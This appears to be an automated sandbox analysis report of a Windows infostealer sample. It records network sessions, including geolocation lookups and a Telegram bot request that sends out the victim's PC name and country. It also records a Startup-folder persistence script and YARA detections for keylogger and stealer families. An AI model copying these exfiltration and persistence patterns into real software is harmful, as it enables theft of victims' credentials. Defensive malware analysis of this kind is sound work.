                                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          14192.168.2.449763104.21.16.14437924C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-10 22:44:32 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                          Connection: Keep-Alive
                                                                                                                          2025-01-10 22:44:32 UTC855INHTTP/1.1 200 OK
                                                                                                                          Date: Fri, 10 Jan 2025 22:44:32 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 362
                                                                                                                          Connection: close
                                                                                                                          Age: 1863861
                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                          cf-cache-status: HIT
                                                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wdeL%2Fri3tT5q9BXxkMSqBegD4bDBKlz35rRSG5gAZNjppFHnrmdhHNh6hvRCNx1wZDeobeNTLF50Av%2F9W0HVmnlPLGrTiYfTvPsMb5IvjWnTyglymNmVVnLcZPpEsDWLTX78CC5%2B"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 90003136cdb64388-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1602&min_rtt=1599&rtt_var=606&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1795817&cwnd=221&unsent_bytes=0&cid=64a396124afce75f&ts=277&x=0"
                                                                                                                          2025-01-10 22:44:32 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          15192.168.2.449765104.21.16.14437924C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-10 22:44:33 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                          2025-01-10 22:44:33 UTC855INHTTP/1.1 200 OK
                                                                                                                          Date: Fri, 10 Jan 2025 22:44:33 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 362
                                                                                                                          Connection: close
                                                                                                                          Age: 1863862
                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                          cf-cache-status: HIT
                                                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WKQ8DfVA57HGgN9Zhu4sfjYWce68Jwcd59QR6WxDs5aiLjGX%2BwWc7wtZjyZF4CWGy6Hy6Ys%2B9lPH7LozYdJxeFP4bFHaajQv1srnuuuMbwYPyTFqjBnUDddcTz2JK%2Bc2exr9V3bk"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 9000313e2d1e7293-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1890&min_rtt=1882&rtt_var=722&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1498973&cwnd=158&unsent_bytes=0&cid=7e15505c911ceccd&ts=145&x=0"
                                                                                                                          2025-01-10 22:44:33 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          16192.168.2.449767104.21.16.14437924C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-10 22:44:34 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                          2025-01-10 22:44:34 UTC861INHTTP/1.1 200 OK
                                                                                                                          Date: Fri, 10 Jan 2025 22:44:34 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 362
                                                                                                                          Connection: close
                                                                                                                          Age: 1863864
                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                          cf-cache-status: HIT
                                                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OleVjBjM2AHkK18fMtt0AwriPNObSQbv%2FX7USXTA%2BvAVFCQCqZmgbAK850WQjtBRpSOHR%2FTlHv0IK1xh5HbQ%2FpLbDoum%2BEMYYtDvs1tJNoT64iJySg9NlqcF41A%2FOwHBNJt35u4e"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 90003145ee7c8ce0-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1814&min_rtt=1804&rtt_var=698&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1544973&cwnd=215&unsent_bytes=0&cid=5092d2db4cb4b231&ts=164&x=0"
                                                                                                                          2025-01-10 22:44:34 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          17192.168.2.449769104.21.16.14437924C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-10 22:44:35 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                          Connection: Keep-Alive
                                                                                                                          2025-01-10 22:44:36 UTC857INHTTP/1.1 200 OK
                                                                                                                          Date: Fri, 10 Jan 2025 22:44:36 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 362
                                                                                                                          Connection: close
                                                                                                                          Age: 1863865
                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                          cf-cache-status: HIT
                                                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MfJfKxpKOg%2BqwrIYNWY5b9qYaV2SH6UKLPL8pDPxm90n6IQbq0AYwN2NzaFGsmJ3IiCAx4lBnO3skN%2B3SVWuGpwlGvfVtvQ2QK73hLXrvy%2F%2FIFLRlZXTX3v7GzERk5WAlcpDrHLp"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 9000314d8ca441ba-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1705&min_rtt=1699&rtt_var=650&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1667618&cwnd=192&unsent_bytes=0&cid=9c64f4cbeda6322e&ts=146&x=0"
                                                                                                                          2025-01-10 22:44:36 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          18192.168.2.449771104.21.16.14437924C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-10 22:44:37 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                          Connection: Keep-Alive
                                                                                                                          2025-01-10 22:44:37 UTC859INHTTP/1.1 200 OK
                                                                                                                          Date: Fri, 10 Jan 2025 22:44:37 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 362
                                                                                                                          Connection: close
                                                                                                                          Age: 1863866
                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                          cf-cache-status: HIT
                                                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cgH2vb0z7NPqnDx40b84bizIKDfnE1U0biopg%2FVl1moDu%2FuStbJCgKc3tNcdKCzV9OBmLkXDMNV8mQfMHHSse%2FCiN7JPm1lQ3PHfaEGOkJqWK0XGakgY2Pw8%2B5ddv%2BL4QR9Pfr8j"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 9000315538f20fa8-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1480&min_rtt=1475&rtt_var=564&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1922317&cwnd=252&unsent_bytes=0&cid=4431cee8fccef106&ts=135&x=0"
                                                                                                                          2025-01-10 22:44:37 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          19192.168.2.449772149.154.167.2204437924C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-10 22:44:38 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:347688%0D%0ADate%20and%20Time:%2011/01/2025%20/%2005:00:03%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20347688%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                                                                          Host: api.telegram.org
                                                                                                                          Connection: Keep-Alive
                                                                                                                          2025-01-10 22:44:38 UTC344INHTTP/1.1 404 Not Found
                                                                                                                          Server: nginx/1.18.0
                                                                                                                          Date: Fri, 10 Jan 2025 22:44:38 GMT
                                                                                                                          Content-Type: application/json
                                                                                                                          Content-Length: 55
                                                                                                                          Connection: close
                                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                          2025-01-10 22:44:38 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                                                                          Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                                                                          Statistics

                                                                                                                          CPU Usage

                                                                                                                          Click to jump to process

                                                                                                                          Memory Usage

                                                                                                                          Click to jump to process

                                                                                                                          High Level Behavior Distribution

                                                                                                                          Click to dive into process behavior distribution

                                                                                                                          Behavior

                                                                                                                          Click to jump to process

                                                                                                                          System Behavior

                                                                                                                          General

                                                                                                                          Target ID:0
                                                                                                                          Start time:17:44:02
                                                                                                                          Start date:10/01/2025
                                                                                                                          Path:C:\Users\user\Desktop\3i1gMM8K4z.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Users\user\Desktop\3i1gMM8K4z.exe"
                                                                                                                          Imagebase:0xee0000
                                                                                                                          File size:1'147'904 bytes
                                                                                                                          MD5 hash:1D0C53E42BD84B7B7CFABED7DAE7F570
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:low
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:1
                                                                                                                          Start time:17:44:05
                                                                                                                          Start date:10/01/2025
                                                                                                                          Path:C:\Users\user\AppData\Local\Okeghem\ghauts.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Users\user\Desktop\3i1gMM8K4z.exe"
                                                                                                                          Imagebase:0x590000
                                                                                                                          File size:1'147'904 bytes
                                                                                                                          MD5 hash:1D0C53E42BD84B7B7CFABED7DAE7F570
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Yara matches:
                                                                                                                          • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000001.00000002.1769744228.0000000000730000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                          Antivirus matches:
                                                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                                                          • Detection: 66%, ReversingLabs
                                                                                                                          Reputation:low
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:2
                                                                                                                          Start time:17:44:09
                                                                                                                          Start date:10/01/2025
                                                                                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Users\user\Desktop\3i1gMM8K4z.exe"
                                                                                                                          Imagebase:0xaf0000
                                                                                                                          File size:45'984 bytes
                                                                                                                          MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Yara matches:
                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.4172452396.00000000031BF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.4171766777.0000000002DD0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000002.00000002.4171766777.0000000002DD0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000002.00000002.4171766777.0000000002DD0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.4171766777.0000000002DD0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000002.00000002.4171766777.0000000002DD0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000002.00000002.4171766777.0000000002DD0000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                          • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000002.00000002.4171766777.0000000002DD0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                                                                                                          • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000002.00000002.4171766777.0000000002DD0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.4178906465.00000000055F0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000002.00000002.4178906465.00000000055F0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000002.00000002.4178906465.00000000055F0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.4178906465.00000000055F0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000002.00000002.4178906465.00000000055F0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000002.00000002.4178906465.00000000055F0000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                          • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000002.00000002.4178906465.00000000055F0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                                                                                                          • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000002.00000002.4178906465.00000000055F0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                                          • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000002.00000002.4172452396.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          Reputation:high
                                                                                                                          Has exited:false

                                                                                                                          General

                                                                                                                          Target ID:4
                                                                                                                          Start time:17:44:19
                                                                                                                          Start date:10/01/2025
                                                                                                                          Path:C:\Windows\System32\wscript.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ghauts.vbs"
                                                                                                                          Imagebase:0x7ff6a3860000
                                                                                                                          File size:170'496 bytes
                                                                                                                          MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                                          Has elevated privileges:false
                                                                                                                          Has administrator privileges:false
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:5
                                                                                                                          Start time:17:44:20
                                                                                                                          Start date:10/01/2025
                                                                                                                          Path:C:\Users\user\AppData\Local\Okeghem\ghauts.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Users\user\AppData\Local\Okeghem\ghauts.exe"
                                                                                                                          Imagebase:0x590000
                                                                                                                          File size:1'147'904 bytes
                                                                                                                          MD5 hash:1D0C53E42BD84B7B7CFABED7DAE7F570
                                                                                                                          Has elevated privileges:false
                                                                                                                          Has administrator privileges:false
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Yara matches:
                                                                                                                          • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000005.00000002.1925396391.0000000003DD0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                          Reputation:low
                                                                                                                          Has exited:true

                                                                                                                          General

                                                                                                                          Target ID:8
                                                                                                                          Start time:17:44:24
                                                                                                                          Start date:10/01/2025
                                                                                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Users\user\AppData\Local\Okeghem\ghauts.exe"
                                                                                                                          Imagebase:0xbd0000
                                                                                                                          File size:45'984 bytes
                                                                                                                          MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                                                                          Has elevated privileges:false
                                                                                                                          Has administrator privileges:false
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Yara matches:
                                                                                                                          • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000008.00000002.4172080373.0000000003071000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000008.00000002.4175454469.0000000004116000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.4172080373.000000000317F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.4171320345.0000000002CD8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000008.00000002.4171320345.0000000002CD8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000008.00000002.4171320345.0000000002CD8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000008.00000002.4171320345.0000000002CD8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000008.00000002.4171320345.0000000002CD8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                          Reputation:high
                                                                                                                          Has exited:false

                                                                                                                          Disassembly

                                                                                                                          Reset < >

                                                                                                                            Execution Graph

                                                                                                                            Execution Coverage:3.4%
                                                                                                                            Dynamic/Decrypted Code Coverage:0.5%
                                                                                                                            Signature Coverage:7.4%
                                                                                                                            Total number of Nodes:2000
                                                                                                                            Total number of Limit Nodes:174
